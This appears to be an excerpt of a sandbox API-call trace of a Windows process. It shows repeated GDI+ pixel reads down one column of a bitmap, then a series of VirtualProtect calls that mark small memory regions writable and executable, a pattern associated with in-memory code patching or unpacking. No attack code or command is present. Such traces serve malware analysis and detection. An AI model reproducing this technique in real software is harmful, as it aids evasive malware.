[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=164, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=165, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=166, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=167, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=168, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=169, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=170, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=171, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=172, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=173, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=174, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=175, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=176, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=177, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=178, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=179, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=180, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=181, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=182, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=183, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=184, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=185, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=186, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=187, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=188, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=189, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=190, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=191, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=192, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=193, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=194, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=195, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=196, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=197, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=198, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=199, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=200, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=201, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=202, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=203, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=204, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=205, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=206, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=207, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=208, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=209, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=210, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=211, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=212, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.386] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=213, color=0x19de90) returned 0x0
[0164.386] GetLastError () returned 0x57
[0164.386] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.386] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.386] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=214, color=0x19de90) returned 0x0
[0164.386] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.436] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=215, color=0x19de90) returned 0x0
[0164.436] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.436] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=216, color=0x19de90) returned 0x0
[0164.436] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.436] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=217, color=0x19de90) returned 0x0
[0164.436] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=218, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.437] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.437] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=219, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.437] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.437] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=220, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.437] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.437] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=221, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=222, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=223, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=224, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=225, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=226, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=227, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=228, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=229, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=230, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=231, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=232, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=233, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=234, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=235, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=236, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=237, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=238, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=239, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=240, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=241, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=242, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=243, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=244, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=245, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0164.443] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.443] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.443] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=246, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0164.443] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.443] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.443] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=247, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0164.443] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=248, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0166.227] VirtualProtect (in: lpAddress=0x8c30178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.252] VirtualProtect (in: lpAddress=0x8c301a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.254] VirtualProtect (in: lpAddress=0x8c301c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.261] VirtualProtect (in: lpAddress=0x8cb4c5e, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.265] VirtualProtect (in: lpAddress=0x8cb4c52, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.265] VirtualProtect (in: lpAddress=0x8c30208, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.270] VirtualProtect (in: lpAddress=0x8c80780, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.275] VirtualProtect (in: lpAddress=0x8c807a4, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.277] VirtualProtect (in: lpAddress=0x8c807ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.283] VirtualProtect (in: lpAddress=0x8c807b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.286] VirtualProtect (in: lpAddress=0x8c807b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.291] VirtualProtect (in: lpAddress=0x8c807bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.298] VirtualProtect (in: lpAddress=0x8c807c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.303] VirtualProtect (in: lpAddress=0x8c807c4, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.305] VirtualProtect (in: lpAddress=0x8c807cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.311] VirtualProtect (in: lpAddress=0x8c807d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.312] VirtualProtect (in: lpAddress=0x8c807d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.313] VirtualProtect (in: lpAddress=0x8c807dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.314] VirtualProtect (in: lpAddress=0x8c807e0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.314] VirtualProtect (in: lpAddress=0x8c807e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
